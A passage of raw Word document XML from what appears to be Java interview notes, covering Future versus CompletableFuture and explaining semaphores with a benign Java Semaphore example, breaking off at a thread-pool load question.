    <w:p w14:paraId="574BBC21"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Future:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7D1522" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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simple, blocking task results, where you need the result of an asynchronous task and can afford to wait.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA07658" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506" w:rsidP="00DF350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 CompletableFuture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1282FCA5" w14:textId="570B6709" w:rsidR="00AF73EB" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506" w:rsidP="00AF73EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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want to write complex, non-blocking asynchronous logic that can be composed, chained, or handled with custom exception handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1210B770" w14:textId="5CE2E7C4" w:rsidR="00AF73EB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AF73EB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="10FD34E5">
          <v:rect id="_x0000_i1876" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0706B412" w14:textId="472ECAE3" w:rsidR="00AF73EB" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="300" w:name="_Toc196307780"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Semaphore?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="300"/>
    </w:p>
    <w:p w14:paraId="1301C211" w14:textId="297A3064" w:rsidR="00AF73EB" w:rsidRPr="008D08F4" w:rsidRDefault="00AF73EB" w:rsidP="008D08F4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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A </w:t>
      </w:r>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Semaphore</w:t>
      </w:r>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a synchronization primitive used in concurrent programming to control access to a shared resource by multiple threads in a parallel programming environment. It is primarily used to manage concurrent access and to avoid race conditions and deadlocks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457ED021" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="008D08F4" w:rsidRDefault="00AF73EB" w:rsidP="008D08F4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Concepts of Semaphore:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D03668B"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Counter</w:t>
      </w:r>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A semaphore typically has an internal counter that determines the number of threads that can access the shared resource simultaneously. The counter is initially set to a specific value and can be incremented or decremented as threads acquire or release the resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7681B331"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Acquire</w:t>
      </w:r>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A thread that wants to access a shared resource must "acquire" the semaphore. This operation decrements the semaphore's counter. If the counter is greater than zero, the thread proceeds; otherwise, it gets blocked until the counter becomes positive again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C450B1"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Release</w:t>
      </w:r>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: After the thread finishes using the shared resource, it "releases" the semaphore, incrementing the counter. This signals other waiting threads that they may now acquire the semaphore and access the resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5873BC" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="008D08F4" w:rsidRDefault="00AF73EB" w:rsidP="008D08F4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Types of Semaphores:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325CE08B"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Binary Semaphore</w:t>
      </w:r>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (also called Mutex):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301F07E5" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="008D08F4" w:rsidRDefault="00AF73EB" w:rsidP="008D08F4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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A binary semaphore has only two possible values: 0 or 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317E960A" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="008D08F4" w:rsidRDefault="00AF73EB" w:rsidP="008D08F4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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It is typically used to control access to a single shared resource, ensuring mutual exclusion (mutex).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604EB9CC" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="008D08F4" w:rsidRDefault="00AF73EB" w:rsidP="008D08F4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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When the semaphore is 1, a thread can acquire it and change it to 0. When it is 0, other threads are blocked until the semaphore is released and its value is set back to 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473AC1D8"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Counting Semaphore</w:t>
      </w:r>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342B432D" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="008D08F4" w:rsidRDefault="00AF73EB" w:rsidP="008D08F4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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This type of semaphore can have any non-negative integer value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABCE8AA" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="008D08F4" w:rsidRDefault="00AF73EB" w:rsidP="008D08F4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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It is used to control access to a limited number of identical resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C36C15C" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="008D08F4" w:rsidRDefault="00AF73EB" w:rsidP="008D08F4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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For example, if a semaphore is initialized with the value 3, then up to 3 threads can acquire it simultaneously. When a thread releases the semaphore, the counter is incremented, allowing another thread to acquire it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA4CD27" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="008D08F4" w:rsidRDefault="00AF73EB" w:rsidP="008D08F4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example Use Case of Semaphore:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5F05C5"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Consider a scenario where a shared resource (e.g., a database connection pool) can accommodate a limited number of concurrent connections. A semaphore can be used to ensure that no more than a set number of threads are accessing the resource at the same time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046D1DAD" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="008D08F4" w:rsidRDefault="00AF73EB" w:rsidP="008D08F4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Code Example (in Java):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691837C8"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import java.util.concurrent.Semaphore;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6120EDDD" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="008D08F4" w:rsidRDefault="00AF73EB" w:rsidP="008D08F4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47521AF1"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public class SemaphoreExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E0595B"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private static final Semaphore semaphore = new Semaphore(3); // Allows 3 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D0CEAD" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="008D08F4" w:rsidRDefault="00AF73EB" w:rsidP="008D08F4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25959BCA"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public static void main(String[] args) throws InterruptedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77865F28"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        // Create 5 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FD8C5F"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for (int i = 0; i &lt; 5; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FF08AE"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new Thread(new Task()).start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFCD1E8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410D6AD4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC80DAC" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="008D08F4" w:rsidRDefault="00AF73EB" w:rsidP="008D08F4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27C16457"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static class Task implements Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413323D0"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F1C3F8"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public void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F7E008"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5A4BB4"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 Acquire the semaphore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05170618"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semaphore.acquire();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F51880E"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System.out.println(Thread.currentThread().getName() + " is accessing the resource.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DD69E9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A34EDE8"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 Simulate some work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B97A417"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Thread.sleep(2000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137ED2C9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036926FD"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 catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740973B3"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e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A89849"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 finally {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E6DE8B"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 Release the semaphore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF452EA"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System.out.println(Thread.currentThread().getName() + " is releasing the resource.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1D9B5F"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semaphore.release();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDE667A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0E1D6E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278BC6E6"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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385A3966"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7858E1B5" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="008D08F4" w:rsidRDefault="00AF73EB" w:rsidP="008D08F4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D7CCED"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Semaphore initialization</w:t>
      </w:r>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The semaphore is initialized with a counter value of 3, which allows up to 3 threads to access the resource at the same time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DD506D"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Acquire</w:t>
      </w:r>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Each thread tries to acquire the semaphore. If the counter is greater than 0, it decrements the counter and proceeds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76634581"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Release</w:t>
      </w:r>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When a thread is done using the resource, it releases the semaphore, incrementing the counter, allowing other threads to acquire the semaphore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596E52E2" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="008D08F4" w:rsidRDefault="00AF73EB" w:rsidP="008D08F4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Advantages of Semaphores:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786E8D07"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread Synchronization</w:t>
      </w:r>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that only a specified number of threads access a resource at the same time, preventing conflicts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44253915"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prevents Overloading</w:t>
      </w:r>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Limits the number of threads that can access a shared resource, preventing overloading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630BB810"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Improved Concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows fine-grained control over concurrent access to shared resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A12B0F" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="008D08F4" w:rsidRDefault="00AF73EB" w:rsidP="008D08F4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FDB1D8"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Semaphore-based synchronization can lead to complex code and increased chances of deadlocks if not used carefully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679C8BAD"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Starvation</w:t>
      </w:r>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If threads are not managed properly, some threads may never get access to the semaphore (called starvation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA74E60" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="008D08F4" w:rsidRDefault="00AF73EB" w:rsidP="008D08F4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In summary, a </w:t>
      </w:r>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>semaphore</w:t>
      </w:r>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a powerful tool for managing concurrent access to shared resources in multi-threaded environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C76B39B" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AF73EB">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B402636">
          <v:rect id="_x0000_i1877" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="073313F8" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRDefault="00B758F9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D91BF79" w14:textId="5B4813E7" w:rsidR="00B758F9" w:rsidRPr="00CE4B95" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>If you create a thread pool of 100 threads and receive 1000 TPS (transactions per second) to your API, how would you handle the load</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
